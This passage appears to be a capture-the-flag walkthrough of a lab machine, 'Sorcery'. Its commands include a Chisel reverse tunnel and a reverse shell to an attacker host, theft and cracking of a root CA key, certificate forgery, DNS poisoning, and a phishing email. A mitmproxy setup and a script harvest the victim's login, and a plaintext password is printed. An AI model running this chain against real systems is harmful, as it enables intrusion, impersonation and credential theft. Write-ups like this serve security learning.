Nmap done: 256 IP addresses (11 hosts up) scanned in 1452.93 seconds
This matches our early findings from the Docker files. The addressing changes each time the machine restarts — but with the service names known, we can use getent hosts <service_name> to resolve the corresponding IP at runtime.
Gitea
Chisel
To get persistent and flexible access to internal services, we pivot with Chisel, a reverse proxy tunnel.
Fire up the Chisel server on the attacker machine:
./chisel server -p 8088 --reverse
Transfer the chisel binary to the victim (via busybox nc or busybox wget), and launch:
/tmp/chisel client 10.10.13.3:8088 R:socks &
This exposes a SOCKS5 proxy on 127.0.0.1:1080 of the attacker machine, allowing full pivoting.
With that, internal services like http://172.19.0.2:3000 become accessible in-browser:

Git or Gitea
Let's step back — why was git.sorcery.htb embedded in the original DNS entries?
Looking at 172.19.0.2, which exposes:
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open unknown
Port 3000 serves Gitea, likely the dev team's internal hub.
It makes sense: the infrastructure distinguishes between public git.sorcery.htb and the internal dev instance, possibly at gitea.sorcery.htb, to avoid DNS collisions.
Same Gitea, different purpose — this one's probably where nicole_sullivan, tom_summers and others work on the actual codebase:

Also note: SSH (port 22) is exposed.
If we succeed in phishing or recovering internal credentials, this could offer a clean path to lateral movement or privilege escalation.

The stage is set — phishing the right dev, and we breach another layer of the maze.
Ftp
From the previously leaked docker-compose.yml, we identify an internal anonymous FTP server:
ftp:
restart: always
image: million12/vsftpd:cd94636
environment:
ANONYMOUS_ACCESS: true
LOG_STDOUT: true
volumes:
- "./ftp/pub:/var/ftp/pub"
- "./certificates/generated/RootCA.crt:/var/ftp/pub/RootCA.crt"
- "./certificates/generated/RootCA.key:/var/ftp/pub/RootCA.key"
healthcheck:
test: ["CMD", "bash", "-c", "cat < /dev/null > /dev/tcp/127.0.0.1/21"]
interval: 5s
timeout: 10s
retries: 5
This reveals a few critical things:
- FTP is wide open to anonymous access
- It's hosting a folder /var/ftp/pub/
- Inside are two highly sensitive files: RootCA.crt and RootCA.key
These are the Certificate Authority credentials — foundational trust material. We've seen this kind of vulnerability chain before (e.g., in the University machine).
The target service is services-ftp-1 at 172.19.0.4.
We can use Python to query it from inside the container:
user@7bfb70ee5b9c$ python3 -c "from ftplib import FTP; ftp=FTP('172.19.0.4'); ftp.login(); ftp.retrlines('LIST')"
drwxrwxrwx 2 ftp ftp 4096 Oct 31 2024 pub
Confirmed: the pub folder is exposed.
Now dump both RootCA.crt and RootCA.key:
python3 -c "
from ftplib import FTP
ftp = FTP('172.19.0.4')
ftp.login()
with open('RootCA.crt', 'wb') as f:
ftp.retrbinary('RETR pub/RootCA.crt', f.write)
with open('RootCA.key', 'wb') as f:
ftp.retrbinary('RETR pub/RootCA.key', f.write)
"
Done:
user@7bfb70ee5b9c:/dns$ ls -l Root*
-rw-r--r-- 1 user user 1826 Jun 16 13:47 RootCA.crt
-rw-r--r-- 1 user user 3434 Jun 16 13:47 RootCA.key
Again, use nc via busybox to download them to our attack machine.
Root CAs
Decrypt CA
We inspect the dumped Root CA files:
$ openssl x509 -in RootCA.crt -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
55:98:e2:11:29:e8:a7:e9:cd:bb:da:e4:5a:56:d7:39:18:e5:ad:cd
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=Sorcery Root CA
Validity
Not Before: Oct 31 02:09:08 2024 GMT
Not After : Aug 16 02:09:08 2298 GMT
Subject: CN=Sorcery Root CA
...
$ head RootCA.key
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIJrTBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQI4I3iO1Zn5XkCAggA
MAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBDcZKASBSs0bWpLaNHAilbOBIIJ
...
This is typical for self-signed Root CAs (Issuer == Subject → CN=Sorcery Root CA).
Now that we know it's a valid CA certificate, we should check that the key and cert match:
openssl rsa -noout -modulus -in RootCA.key | openssl md5
openssl x509 -noout -modulus -in RootCA.crt | openssl md5
However:
$ openssl rsa -noout -modulus -in RootCA.key | openssl md5
Enter pass phrase for RootCA.key:
Could not find private key from RootCA.key
802BA8506B740000:error:1608010C:STORE routines:ossl_store_handle_load_result:unsupported:crypto/store/store_result.c:151:
802BA8506B740000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:providers/implementations/ciphers/ciphercommon_block.c:107:
802BA8506B740000:error:11800074:PKCS12 routines:PKCS12_pbe_crypt_ex:pkcs12 cipherfinal error:crypto/pkcs12/p12_decr.c:92:empty password
MD5(stdin)= d41d8cd98f00b204e9800998ecf8427e
It's encrypted, and standard decryption fails without the passphrase.
We can try to brute-force the passphrase of the RootCA.key with John the Ripper:
pem2john.py RootCA.key > rsa_hash.txt
The extracted hash looks like:
$PEM$2$pbkdf2$sha256$aes256_cbc$4$e08de23b5667e579$2048$dc64a0120...
Run john on the hash:
john rsa_hash.txt --wordlist=~/wordlists/rockyou.txt
But john chokes on prf=sha256:
Warning: PEM prf algorithm <sha256> is not supported currently!
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
To fix this, we can refer to this issue.
The core issue is that pem2john.py and John's PEM format plugin (pem_fmt_plug.c) are hardcoded to pbkdf2_sha1, which won't work with prf=sha256.
We can either fix the source ourselves, or simply crack the hash with hashcat mode 24420 (PEM: PKCS#8 private key (PBKDF2-HMAC-SHA256 AES)); an example format, per the Hashcat Wiki:
$PEM$2$4$ed02960b8a10b1f1$2048$a634c482a95f23bd8fada558e1bac2cf$1232$50b21db4aededb96...
Therefore, remove this part from the pem2john output:
$pbkdf2$sha256$aes256_cbc
Then we can crack it with hashcat:
hashcat -m 24420 -a 0 pem_hash.txt ~/wordlists/rockyou.txt --force
Nice password:
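The munge is a one-line string edit — a quick sketch with illustrative salt/ciphertext values, not the real hash:

```python
# pem2john output (PBKDF2-SHA256 + AES-256-CBC parameters spelled out)
pem_hash = "$PEM$2$pbkdf2$sha256$aes256_cbc$4$e08de23b5667e579$2048$deadbeef$1232$cafebabe"

# hashcat mode 24420 expects those algorithm fields stripped
hashcat_hash = pem_hash.replace("$pbkdf2$sha256$aes256_cbc", "", 1)
print(hashcat_hash)  # $PEM$2$4$e08de23b5667e579$2048$deadbeef$1232$cafebabe
```

The remaining fields (salt, iteration count, ciphertext) are left untouched; only the algorithm markers are removed.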

Now decrypt it cleanly:
openssl rsa -in RootCA.key -out RootCA-decrypted.key
Entering the passphrase creates RootCA-decrypted.key, an unencrypted RSA private key:
$ ll RootCA-decrypted.key
-rw------- 1 Axura Axura 3.2K Jun 16 21:07 RootCA-decrypted.key
$ openssl rsa -in RootCA-decrypted.key -check
RSA key ok
writing RSA key
-----BEGIN PRIVATE KEY-----
MIIJQgIBADANBgkqhkiG9w0BAQEFAASCCSwwggkoAgEAAoICAQCN/ViSM+ZkeuX1
...
NIC+fXzbrAq6zgOBbw9oqSQkjjcxFQ==
-----END PRIVATE KEY-----
Sign Certs
We can now sign arbitrary certs — the magic weapon for phishing, impersonation, and MiTM.
Generate a key + CSR:
openssl req -newkey rsa:2048 -nodes \
-keyout giteas.key \
-out giteas.csr \
-subj "/CN=giteas.sorcery.htb"
Sign the cert using the CA (RootCA.crt, RootCA.key) with the cracked passphrase:
openssl x509 -req -in giteas.csr \
-CA RootCA.crt -CAkey RootCA.key \
-CAcreateserial \
-out giteas.crt \
-days 365
Verify the certificate against the CA:
$ openssl x509 -in giteas.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
79:0a:35:58:b4:49:92:5a:a8:72:fc:65:a5:4c:03:e3:00:ac:80:18
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=Sorcery Root CA
Validity
Not Before: Jun 17 08:26:57 2025 GMT
Not After : Jun 17 08:26:57 2026 GMT
Subject: CN=giteas.sorcery.htb
Subject Public Key Info:
...
The cert game just turned in our favor.
Dns
With busybox in play, we can enumerate internal bindings via:
user@7bfb70ee5b9c:/tmp/busybox netstat -lantp
netstat: showing only processes with your user ID
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 10/dnsmasq
tcp 0 0 127.0.0.11:36971 0.0.0.0:* LISTEN -
tcp 1 0 172.19.0.8:39438 172.19.0.6:9092 CLOSE_WAIT 9/dns
tcp 1 0 172.19.0.8:39432 172.19.0.6:9092 CLOSE_WAIT 9/dns
tcp 0 237 172.19.0.8:37612 10.10.13.3:4444 ESTABLISHED 23/sh
tcp 0 0 :::53 :::* LISTEN 10/dnsmasq
dnsmasq is listening on port 53 on all interfaces:
- The container IP is 172.19.0.8.
- It is connecting to 172.19.0.6:9092 — this is the Kafka container.
- 127.0.0.11:36971 is Docker's internal DNS forwarder.
Dns Parsing Files
There's a /dns directory under root:
user@7bfb70ee5b9c:/app$ ls -l /
total 572
drwxr-xr-x 1 root root 4096 Apr 28 12:07 app
drwxr-xr-x 1 user user 4096 Apr 28 12:07 dns
-rwxr-xr-x 1 root root 117 Oct 30 2024 docker-entrypoint.sh
-rwxr-xr-x 1 root root 506040 Sep 27 2023 wait
...
It's where the web app stores the suspicious convert.sh:
user@7bfb70ee5b9c:/dns$ ls -l
total 8
-rwxr-xr-x 1 root root 364 Aug 31 2024 convert.sh
-rwxr--r-- 1 user user 0 Oct 31 2024 entries
-rw-r--r-- 1 root root 598 Jun 16 04:52 hosts
convert.sh is owned by root and executable. Read it:
#!/bin/bash

entries_file=/dns/entries
hosts_files=("/dns/hosts" "/dns/hosts-user")

> $entries_file

for hosts_file in ${hosts_files[@]}; do
    while IFS= read -r line; do
        key=$(echo $line | awk '{ print $1 }')
        values=$(echo $line | cut -d ' ' -f2-)
        for value in $values; do
            echo "$key $value" >> $entries_file
        done
    done < $hosts_file
done
This script:
- Clears /dns/entries
- Reads from /dns/hosts and /dns/hosts-user
- Splits lines into key-value pairs
- Writes to entries as flat hosts-style lines
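The splitting logic can be mimicked in a few lines of Python (an illustration only, with made-up hostnames; it ignores the script's odd handling of single-field lines):

```python
# Rough Python equivalent of convert.sh: each "key v1 v2 ..." line yields
# one "key value" entry per value.
def convert(lines):
    entries = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue  # skip lines without at least one value
        key, values = parts[0], parts[1:]
        for value in values:
            entries.append(f"{key} {value}")
    return entries

# "a.htb" and "b.htb" are hypothetical example hostnames:
print(convert(["127.0.0.1 git.sorcery.htb", "10.10.13.3 a.htb b.htb"]))
```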
Permissions:
- /dns/hosts: root-owned, read-only
- /dns/hosts-user: not present
- /dns: writable by user
Which means we can create /dns/hosts-user with arbitrary content.
user@7bfb70ee5b9c:/dns$ cat entries
user@7bfb70ee5b9c:/dns$ cat hosts
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
...However, we notice that there's no /dns/hosts-user file currently present, while the /dns folder itself is writable by user:
user@7bfb70ee5b9c:/dns$ ls -ld /dns
drwxr-xr-x 1 user user 4096 Apr 28 12:07 /dns
This means we can create /dns/hosts-user with content of our choice (as user), and when convert.sh is executed, our controlled content will be processed.
Dnsmasq
Environment confirms it's running as a supervised service:
user@7bfb70ee5b9c:/app$ env
...
SUPERVISOR_GROUP_NAME=dns
PWD=/app
SUPERVISOR_PROCESS_NAME=dns
SUPERVISOR_ENABLED=1
And we now know /dns/convert.sh parses two files: /dns/hosts and /dns/hosts-user. The script's output format is exactly that of a hosts file:
127.0.0.1 git.sorcery.htb
The user running the reverse shell is user, not nobody, so it's inside a service container. We can inspect users via /etc/passwd:
user@7bfb70ee5b9c:/app$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1001:1001::/home/user:/usr/sbin/nologin
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
We see a user dnsmasq. dnsmasq is a lightweight DNS forwarder and DHCP server, often used in embedded systems or containers. It:
- Resolves DNS queries (can forward to upstream DNS or serve local entries)
- Can read from a hosts-style file to serve custom DNS records (e.g., from /etc/hosts or a custom file)
- Supports static mappings like 127.0.0.1 git.sorcery.htb
Additionally, we can check running processes:
user@7bfb70ee5b9c:/dns$ ps -ef | grep dnsmasq
user 10 7 0 11:07 ? 00:00:00 /usr/sbin/dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hosts
user 48 27 0 12:24 pts/0 00:00:00 grep dnsmasq
Bingo — dnsmasq is reading exactly those two hosts files:
dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hosts
Which means:
- It's using both hosts-user and hosts files as DNS sources
- Since we own /dns/hosts-user — we own the DNS mapping
Dns Poisoning
This means we can create the hosts file hosts-user. Our next target is the user who runs convert.sh, as indicated in the Rust source code (Ref-Hook-13), which relies on the generated entries file for DNS resolution.
Write to /dns/hosts-user:
echo '10.10.13.3 giteas.sorcery.htb' > /dns/hosts-user
Trigger the regeneration:
/dns/convert.sh
This creates the entries file:
user@7bfb70ee5b9c:/dns$ tail entries
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
127.0.0.1 git.sorcery.htb
10.10.13.3 giteas.sorcery.htb
Next we need to force dnsmasq to resolve DNS according to our settings. We can run:
pkill dnsmasq
This works because dnsmasq was run as user. To make sure it restarts and loads the configs, run it again:
user@7bfb70ee5b9c:/dns$ dnsmasq --no-daemon --addn-hosts /dns/hosts-user --addn-hosts /dns/hosts &
dnsmasq: started, version 2.89 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus no-UBus i18n IDN2 DHCP DHCPv6 no-Lua TFTP conntrack ipset nftset auth cryptohash DNSSEC loop-detect inotify dumpfile
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 127.0.0.11#53
dnsmasq: read /etc/hosts - 9 names
dnsmasq: read /dns/hosts - 22 names
dnsmasq: read /dns/hosts-user - 1 names
Now we can verify whether we successfully hijacked the DNS record:
dig @127.0.0.1 giteas.sorcery.htb
Jackpot:

Mailhog
We previously identified an internal mail service and a bot, confirmed again by querying DNS runtime mappings:
user@7bfb70ee5b9c:/dns$ getent hosts mail
172.19.0.10 mail
user@7bfb70ee5b9c:/dns$ getent hosts mail_bot
172.19.0.5 mail_bot
Ports 1025 and 8025 are exposed on 172.19.0.10 — this strongly suggests MailHog or MailDev.
| Port | Common Use |
|---|---|
| 1025 | Fake SMTP server (inbound) — listens for emails |
| 8025 | Web UI for reading received emails |
Probe the MailHog web UI from within the container:
/tmp/busybox wget -qO- http://172.19.0.10:8025
It responds with:
<!DOCTYPE html>
<html ng-app="mailhogApp">
<head>
<title>MailHog</title>
<meta charset="utf-8">
...
</body>
</html>
That confirms MailHog is active on http://172.19.0.10:8025:

We can now query MailHog's API:
user@7bfb70ee5b9c:/dns$ /tmp/busybox wget -qO- http://172.19.0.10:8025/api/v2/messages
{"total":0,"count":0,"start":0,"items":[]}
No emails yet — the inbox is clean.
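Polling the inbox by hand gets tedious; the v2 response can be parsed with a short script — a sketch whose field names follow the sample response above:

```python
import json

# Summarize a MailHog /api/v2/messages response.
def summarize(raw: str) -> str:
    data = json.loads(raw)
    return f"{data['total']} message(s), showing {data['count']} from offset {data['start']}"

# Sample response captured above (empty inbox):
print(summarize('{"total":0,"count":0,"start":0,"items":[]}'))
# -> 0 message(s), showing 0 from offset 0
```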
Mail bot
We also have a mail_bot container at 172.19.0.5. As the name implies, it likely simulates a target user, such as tom_summers, clicking phishing links from emails — very much a CTF setup.
Time to bait the hook.
Craft a phishing message — mail.txt:
From: [email protected]
To: [email protected]
Subject: Please verify your account
Hi Tom,
We detected unusual activity in your Gitea account.
Please verify your account to avoid suspension:
https://giteas.sorcery.htb/user/login
Regards,
Infosec Team
Ready for injection.
Phishing
Everything is set — time to launch the phish.
First, we configure mitmproxy with our forged cert for giteas.sorcery.htb:
pip install mitmproxy
cat giteas.crt giteas.key > giteas.pem
mitmproxy \
--mode reverse:https://git.sorcery.htb \
--certs giteas.sorcery.htb=giteas.pem \
--save-stream-file mitm_traffic \
--ssl-insecure \
--listen-port 443
We're now impersonating the legitimate Gitea (https://git.sorcery.htb) over HTTPS — ready to intercept.
Ensure /etc/proxychains.conf points to our local chisel tunnel:
socks5 127.0.0.1 1080
Use swaks over proxychains to drop the crafted bait:
proxychains swaks \
--to [email protected] \
--from [email protected] \
--server 172.19.0.10:1025 \
--header "Subject: Please verify your account" \
--body @mail.txt
The trap is set. And Tom bites:

His browser connects to us — our reverse proxy MITMs the real Gitea:

And then — the golden line:
POST https://git.sorcery.htb/user/login
<< Client disconnected.
The victim submitted credentials — but the backend rejected them (the password was reset by the Infosec team). Doesn't matter. We have the POST data.
Use mitmdump to parse mitm_traffic with the following script, extract_login.py:
from mitmproxy import io
from mitmproxy.exceptions import FlowReadException

with open("mitm_traffic", "rb") as logfile:
    freader = io.FlowReader(logfile)
    try:
        for flow in freader.stream():
            if flow.request.method == "POST" and "/login" in flow.request.path:
                print("[+] POST to:", flow.request.pretty_url)
                print("[+] Headers:")
                print(flow.request.headers)
                print("[+] Body:")
                print(flow.request.get_text())
                print("=" * 50)
    except FlowReadException as e:
        print("Flow file error:", e)
Run it with mitmdump:
mitmdump -nr mitm_traffic -s extract_login.pyJackpot:

Stolen credentials:
username: tom_summers
password: jNsMKQ6k2.XDMPu.
Though his Gitea access was revoked, the password still works for SSH login:

This gives us a solid user shell — and the user flag.
ROOT
Recall that the internal Gitea server exposes port 22 in addition to 3000 — we can assume SSH is the next move toward root.
tom_summers@main:~$ ls /home
rebecca_smith tom_summers tom_summers_admin user vagrant
Internal Enum
LinPEAS
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root:
tom_sum+ 1442 0.0 0.7 227012 60772 ? S 06:26 0:00 /usr/bin/Xvfb :1 -fbdir /xorg/xvfb -screen 0 512x256x24 -nolisten local
...
root 465317 0.0 0.1 28444 11776 ? Ss 11:05 0:00 /usr/sbin/sssd -i --logger=files
root 465328 0.0 0.2 95348 21376 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_be --domain sorcery.htb --uid 0 --gid 0 --logger=files
root 465353 0.4 0.5 61732 47744 ? S 11:05 0:02 _ /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 465354 0.0 0.1 29620 14080 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 465355 0.0 0.1 27604 11008 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_ssh --uid 0 --gid 0 --logger=files
root 465356 0.0 0.1 27468 11008 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_sudo --uid 0 --gid 0 --logger=files
root 465357 0.0 0.1 73048 16128 ? S 11:05 0:00 _ /usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 634 with ppid 1 is run by user systemd-resolve but the ppid user is root
Proc 651 with ppid 642 is run by user _laurel but the ppid user is root
Proc 835 with ppid 1 is run by user messagebus but the ppid user is root
Proc 1422 with ppid 1411 is run by user tom_summers_admin but the ppid user is root
Proc 1434 with ppid 1 is run by user _chrony but the ppid user is root
Proc 1442 with ppid 1 is run by user tom_summers_admin but the ppid user is root
...
╔══════════╣ Hostname, hosts and DNS
main.sorcery.htb
127.0.0.1 localhost main.sorcery.htb sorcery sorcery.htb
127.0.1.1 ubuntu-2404
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.23.0.2 dc01.sorcery.htb
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-24ea6f65bc59: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.21.0.1 netmask 255.255.0.0 broadcast 172.21.255.255
inet6 fe80::44c4:7bff:fe7e:eafc prefixlen 64 scopeid 0x20<link>
ether 46:c4:7b:7e:ea:fc txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-3ff4274bb73e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.23.0.1 netmask 255.255.0.0 broadcast 172.23.255.255
inet6 fe80::404f:23ff:feea:8d2e prefixlen 64 scopeid 0x20<link>
ether 42:4f:23:ea:8d:2e txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-9ea714ea7b8c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.19.0.1 netmask 255.255.0.0 broadcast 172.19.255.255
inet6 fe80::6c71:a2ff:fefb:bc3c prefixlen 64 scopeid 0x20<link>
ether 6e:71:a2:fb:bc:3c txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 5e:ae:52:18:10:79 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.255.204 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:3147 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:3147 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:31:47 txqueuelen 1000 (Ethernet)
RX packets 25382 bytes 2651691 (2.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7097 bytes 774435 (774.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:636 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:88 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:389 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:464 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
╔══════════╣ Users with console
rebecca_smith:x:2003:2003::/home/rebecca_smith:/usr/bin/bash
root:x:0:0:root:/root:/bin/bash
tom_summers:x:2001:2001::/home/tom_summers:/usr/bin/bash
tom_summers_admin:x:2002:2002::/home/tom_summers_admin:/usr/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
vagrant:x:1001:1001::/home/vagrant:/usr/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)
uid=106(sssd) gid=105(sssd) groups=105(sssd)
uid=107(dockremap) gid=106(dockremap) groups=106(dockremap)
uid=1001(vagrant) gid=1001(vagrant) groups=1001(vagrant)
uid=2001(tom_summers) gid=2001(tom_summers) groups=2001(tom_summers)
uid=2002(tom_summers_admin) gid=2002(tom_summers_admin) groups=2002(tom_summers_admin)
uid=2003(rebecca_smith) gid=2003(rebecca_smith) groups=2003(rebecca_smith)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...
╔══════════╣ Searching kerberos conf files and tickets
╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
kadmin was found on /usr/bin/kadmin
kadmin was found on /usr/bin/kinit
klist execution
klist: Credentials cache keyring 'persistent:2001:2001' not found
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r-- 1 root root 789 Jun 17 11:05 /etc/krb5.conf
#File modified by ipa-client-install
includedir /etc/krb5.conf.d/
[libdefaults]
default_realm = SORCERY.HTB
dns_lookup_realm = false
rdns = false
dns_lookup_realm = false 04:16:40 [472/1672]
rdns = false
dns_canonicalize_hostname = false
dns_lookup_kdc = true
ticket_lifetime = 24h
forwardable = true
udp_preference_limit = 0
default_ccache_name = KEYRING:persistent:%{uid}
[realms]
SORCERY.HTB = {
kdc = dc01.sorcery.htb:88
master_kdc = dc01.sorcery.htb:88
admin_server = dc01.sorcery.htb:749
kpasswd_server = dc01.sorcery.htb:464
default_domain = sorcery.htb
pkinit_anchors = FILE:/var/lib/ipa-client/pki/kdc-ca-bundle.pem
pkinit_pool = FILE:/var/lib/ipa-client/pki/ca-bundle.pem
}
[domain_realm]
.sorcery.htb = SORCERY.HTB
sorcery.htb = SORCERY.HTB
main.sorcery.htb = SORCERY.HTB
-rw-r--r-- 1 root root 192 Oct 23 2024 /usr/lib/x86_64-linux-gnu/sssd/conf/sssd.conf
[sssd]
domains = shadowutils
[nss]
[pam]
[domain/shadowutils]
id_provider = proxy
proxy_lib_name = files
auth_provider = proxy
proxy_pam_target = sssd-shadowutils
proxy_fast_alias = True
tickets kerberos Not Found
klist Not Found
╔══════════╣ Analyzing FreeIPA Files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting
drwxr-xr-x 3 root root 4096 Oct 30 2024 /etc/ipa
-rw-r--r-- 1 root root 230 Oct 30 2024 /etc/ipa/default.conf
#File modified by ipa-client-install
[global]
basedn = dc=sorcery,dc=htb
realm = SORCERY.HTB
domain = sorcery.htb
server = dc01.sorcery.htb
host = main.sorcery.htb
xmlrpc_uri = https://dc01.sorcery.htb/ipa/xml
enable_ra = True
-rwxr-xr-x 1 root root 987 Apr 12 2024 /usr/bin/ipa
drwxr-xr-x 3 root root 4096 Oct 30 2024 /usr/lib/ipa
drw-r-xr-x 2 root root 4096 Apr 12 2024 /usr/share/bash-completion/completions/ipa
drwxr-xr-x 3 root root 4096 Oct 30 2024 /usr/share/ipa
drwxr-xr-x 2 root root 4096 Jun 9 13:10 /usr/src/linux-headers-6.8.0-60/drivers/net/ipa
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/dockerd-rootless.sh
/usr/bin/dockerd-rootless-setuptool.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 4 root root 4096 Apr 24 12:57 .
drwxr-xr-x 25 root root 4096 Apr 28 12:11 ..
drwx--x--x 4 root root 4096 Oct 31 2024 containerd
drwx------ 2 admin admins 4096 Apr 25 12:43 scripts
╔══════════╣ Unexpected in root
/bin.usr-is-merged
/xorg
/sbin.usr-is-merged
/lib.usr-is-merged
/provision
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/ipa/nssdb/cert9.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 3, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 3
Found /etc/ipa/nssdb/key4.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3045001, file counter 5, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for
5
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-r--r--r-- 1 tom_summers_admin tom_summers_admin 11 Jun 17 06:26 /tmp/.X1-lock
-rw-r--r-- 1 root root 2221 Apr 28 07:56 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 32 Mar 31 17:53 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 32 Jun 9 12:53 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 32 Oct 31 2024 /var/backups/dpkg.arch.6.gz
-rw-r--r-- 1 root root 32 Apr 28 07:56 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 0 Jun 17 06:26 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 1482 Sep 25 2024 /var/backups/alternatives.tar.4.gz
-rw-r--r-- 1 root root 2152 Mar 19 14:50 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 2214 Mar 31 17:53 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 40960 Jun 10 19:17 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 32 Mar 19 14:50 /var/backups/dpkg.arch.5.gz
-rw-r--r-- 1 root root 32 Jun 10 19:17 /var/backups/dpkg.arch.1.gz
We have a lot of valuable findings.
System Overview
- Hostname: main.sorcery.htb
